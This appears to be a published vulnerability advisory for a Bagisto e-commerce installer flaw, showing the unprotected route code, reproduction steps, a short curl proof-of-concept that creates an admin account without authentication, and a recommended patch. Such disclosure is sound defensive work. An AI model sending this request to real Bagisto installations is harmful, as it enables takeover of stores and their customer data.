CVE-2026-21446

CRITICAL9.8EPSS 0.14%

Bagisto Missing Authentication on Installer API Endpoints

Published: 1/2/2026Modified: 2/3/2026

Description

### Vulnerable Code **File:** `packages/Ibkul/Installer/src/Routes/Ib.php` ``` <?php use Illuminate\\Session\\Middleware\\StartSession; use Illuminate\\Support\\Facades\\Route; use Ibkul\\Installer\\Http\\Controllers\\InstallerController; Route::middleware(\['Ib', 'installer\_locale'\])-\>group(function () { Route::controller(InstallerController::class)-\>group(function () { Route::get('install', 'index')-\>name('installer.index'); Route::middleware(StartSession::class)-\>prefix('install/api')-\>group(function () { Route::post('env-file-setup', 'envFileSetup')-\>name('installer.env\_file\_setup'); Route::post('run-migration', 'runMigration')-\>name('installer.run\_migration')-\>withoutMiddleware('Ib'); Route::post('run-seeder', 'runSeeder')-\>name('installer.run\_seeder')-\>withoutMiddleware('Ib'); Route::get('download-sample', 'downloadSample')-\>name('installer.download\_sample')-\>withoutMiddleware('Ib'); Route::post('admin-config-setup', 'adminConfigSetup')-\>name('installer.admin\_config\_setup')-\>withoutMiddleware('Ib'); Route::post('sample-products-setup', 'createSampleProducts')-\>name('installer.sample\_products\_setup')-\>withoutMiddleware('Ib'); }); }); }); ``` API routes remain active even after initial installation is complete, allowing any unauthenticated attacker to: - Create admin accounts - Modify application configuration - Potentially overwrite existing data the underlying **API endpoints** (`/install/api/*`) are directly accessible and exploitable without any authentication. An attacker can bypass the Ib installer entirely by calling the API endpoints directly. ### How to Reproduce 1. The Ib installer UI at `http://localhost:8000/install` has client-side protections 2. **However, the API endpoints are directly exploitable:** - The attack works by calling `/install/api/admin-config-setup` directly via curl/HTTP client - No CSRF token, session, or authentication is required - The Ib UI workflow is completely bypassed ### Proof of Concept ``` #!/bin/bash # PoC: Create admin account without authentication TARGET="http://localhost:8000" # Create a new admin account curl -X POST "$TARGET/install/api/admin-config-setup" \ -H "Content-Type: application/json" \ -d '{ "admin_name": "Attacker", "admin_email": "[email protected]", "admin_password": "HackedPassword123" }' echo "" echo "New admin account created!" echo "Login at: $TARGET/admin" echo "Email: [email protected]" ``` ### Expected Result The API should reject unauthenticated requests with 401/403 status. ### Actual Result The API accepts the request and creates a new admin account, allowing full administrative access to the e-commerce platform. ### Recommended Patch Add installation completion check ``` // In InstallerController.php or a new middleware public function __construct() { // Check if application is already installed if (file_exists(base_path('.env')) && config('app.key') && \Schema::hasTable('admins') && \DB::table('admins')->count() > 0) { abort(404, 'Application already installed'); } } ```

Affected packages (1)

Packagist/bagisto/bagisto>= 2.3.0, < 2.3.10

CVSS scores

Source	Version	Severity	Vector
osv	CVSS 4.0	—	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P
osv	CVSS 3.1	CRITICAL9.8	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

Affected packages (1)

CVSS scores

References (4)